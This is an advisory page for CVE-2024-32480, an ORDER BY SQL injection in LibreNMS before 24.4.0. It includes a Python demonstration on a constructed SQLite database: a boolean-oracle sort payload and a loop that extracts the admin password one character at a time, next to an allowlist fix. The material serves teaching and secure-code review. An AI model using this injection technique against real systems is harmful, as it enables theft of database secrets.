LibreNMS vulnerable to SQL injection in prior versions
CVE-2024-32480

CVSS v3.1 base score: 7.2 (HIGH)

Key Information:

Vendor: LibreNMS
Status: Vendor
CVE Published: 22 April 2024

What is CVE-2024-32480?

LibreNMS is an open-source network monitoring system built on PHP, MySQL, and SNMP. In versions prior to 24.4.0, the `order` parameter taken from the user-controlled `$request` object is concatenated directly into an SQL statement after only a basic string check, so an authenticated user with elevated privileges (CVSS rates Privileges Required as High) can alter the query. Because the value lands in the ORDER BY clause, the check does not prevent injection: ORDER BY cannot be bound as a prepared-statement parameter, and an attacker does not need to terminate the statement to reach other tables from inside a sort expression. Successful exploitation allows the attacker to read and extract sensitive data from the database. The issue is fixed in version 24.4.0; users should upgrade.
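The following is an added illustration of the vulnerability class described above; it is not LibreNMS's code and does not reproduce the affected file or query. It uses Python with an in-memory SQLite database (LibreNMS itself is PHP on MySQL), a constructed `devices`/`users` schema that is not LibreNMS's, and an assumed "basic string check" that rejects statement terminators and comment markers. The vulnerable handler concatenates the sort expression, the oracle turns the resulting row order into a true/false signal, and `extract_admin_password` uses that signal to read a column the endpoint never returns. The hardened handler shows the fix pattern: match the column and direction against a fixed allowlist and only ever interpolate allowlisted literals.

```python
import sqlite3
import string


def make_db():
    """Constructed in-memory stand-in for a monitoring database.
    Table and column names are illustrative only (not LibreNMS's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE devices (device_id INTEGER PRIMARY KEY, hostname TEXT);
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO devices VALUES (1, 'core-sw1'), (2, 'edge-rtr1'), (3, 'ap-lobby');
        INSERT INTO users VALUES (1, 'admin', 's3cret-hash');
    """)
    return conn


def list_devices_vulnerable(conn, order):
    """Vulnerable pattern: a 'basic string check', then string concatenation.

    Rejecting ';' and '--' (an assumed check, for illustration) does nothing
    against ORDER BY injection: the attacker never needs to leave the query,
    a whole expression is legal after ORDER BY.
    """
    if not isinstance(order, str) or ";" in order or "--" in order:
        raise ValueError("order rejected by basic check")
    sql = "SELECT device_id, hostname FROM devices ORDER BY " + order
    return [hostname for _, hostname in conn.execute(sql)]


ALLOWED_SORT_COLUMNS = {"device_id", "hostname"}


def list_devices_safe(conn, order):
    """Hardened form: ORDER BY cannot take a bound parameter, so the column
    and direction are matched against a fixed allowlist and only allowlisted
    literals are interpolated into the SQL string."""
    column, _, direction = order.strip().partition(" ")
    direction = (direction.strip() or "asc").lower()
    if column not in ALLOWED_SORT_COLUMNS or direction not in ("asc", "desc"):
        raise ValueError("order not in allowlist")
    sql = f"SELECT device_id, hostname FROM devices ORDER BY {column} {direction}"
    return [hostname for _, hostname in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean oracle built from the sort order alone: if `condition` is true
    the rows come back sorted by hostname, otherwise by device_id. No content
    from `users` is ever returned, yet its truth value leaks."""
    payload = f"CASE WHEN ({condition}) THEN hostname ELSE device_id END"
    return list_devices_vulnerable(conn, payload) == list_devices_vulnerable(conn, "hostname")


def extract_admin_password(conn, max_len=32):
    """Read users.password one character at a time through the oracle."""
    charset = string.ascii_lowercase + string.digits + "-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (
                "substr((SELECT password FROM users WHERE username = 'admin'), "
                f"{pos}, 1) = '{ch}'"
            )
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the secret
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal sort:", list_devices_vulnerable(db, "hostname"))
    print("leaked via ORDER BY oracle:", extract_admin_password(db))
    print("hardened sort:", list_devices_safe(db, "hostname desc"))
    try:
        list_devices_safe(db, "CASE WHEN (1=1) THEN hostname ELSE device_id END")
    except ValueError as err:
        print("hardened handler blocked payload:", err)
```

The takeaway for reviewing similar code: any sort, column or table name that reaches SQL from a request must be validated against a closed set of known identifiers; blacklisting characters or checking that the value "is a string" is not a defence for positions that cannot be parameterized.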

Affected Version(s)

librenms < 24.4.0

CVSS v3.1

Score: 7.2
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
